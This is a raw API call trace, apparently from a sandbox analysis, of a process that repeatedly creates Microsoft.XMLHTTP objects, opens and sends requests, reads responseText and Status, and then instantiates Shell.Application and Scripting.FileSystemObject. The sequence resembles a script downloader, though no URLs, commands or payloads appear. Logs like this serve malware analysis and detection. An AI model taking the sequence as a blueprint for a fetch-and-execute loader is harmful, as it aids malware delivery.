	[0272.458] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0272.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0272.458] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c20) returned 0x0
	[0272.458] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0272.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0272.458] ??2@YAPEAX_K@Z () returned 0x62f330
	[0272.458] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0272.458] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0272.458] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0272.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c20) returned 0x0
	[0272.458] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c20) returned 0x3
	[0272.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0272.458] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0272.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0272.458] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0272.458] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0272.459] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0273.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0273.255] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0273.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0273.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0273.255] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0273.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0273.255] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0273.255] SysStringLen (param_1=0x0) returned 0x0
	[0273.255] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0273.255] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0273.255] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0273.256] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0273.256] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0273.256] ??2@YAPEAX_K@Z () returned 0x62f350
	[0273.256] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0273.256] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0273.256] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0273.256] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0273.256] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0273.256] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0273.256] SysStringLen (param_1=0x0) returned 0x0
	[0273.256] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0273.259] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0273.260] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0273.260] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0273.260] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0273.260] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0273.260] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0274.412] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0274.412] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0274.412] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0274.414] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0274.414] SysStringLen (param_1=0x0) returned 0x0
	[0274.414] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0274.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0274.414] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c20) returned 0x0
	[0274.414] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0274.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0274.414] ??2@YAPEAX_K@Z () returned 0x62f330
	[0274.414] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f330) 
	[0274.415] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0274.415] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0274.415] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c20) returned 0x0
	[0274.415] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c20) returned 0x3
	[0274.415] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0274.415] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0274.417] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0274.418] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0274.418] SysStringLen (param_1=0x0) returned 0x0
	[0274.418] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0274.418] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0274.418] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0274.418] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0274.418] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0274.418] ??2@YAPEAX_K@Z () returned 0x62f310
	[0274.418] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0274.418] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0274.418] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0274.418] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0274.418] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0274.419] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0274.419] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0274.419] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0274.419] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0274.419] SysStringLen (param_1=0x0) returned 0x0
	[0274.419] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0274.419] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0274.419] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bc0) returned 0x0
	[0274.419] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0274.419] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0274.419] ??2@YAPEAX_K@Z () returned 0x62f330
	[0274.419] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0274.419] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0274.419] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0274.419] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bc0) returned 0x0
	[0274.420] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bc0) returned 0x3
	[0274.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0274.420] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bc0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0274.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0274.420] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0274.420] SysStringLen (param_1=0x0) returned 0x0
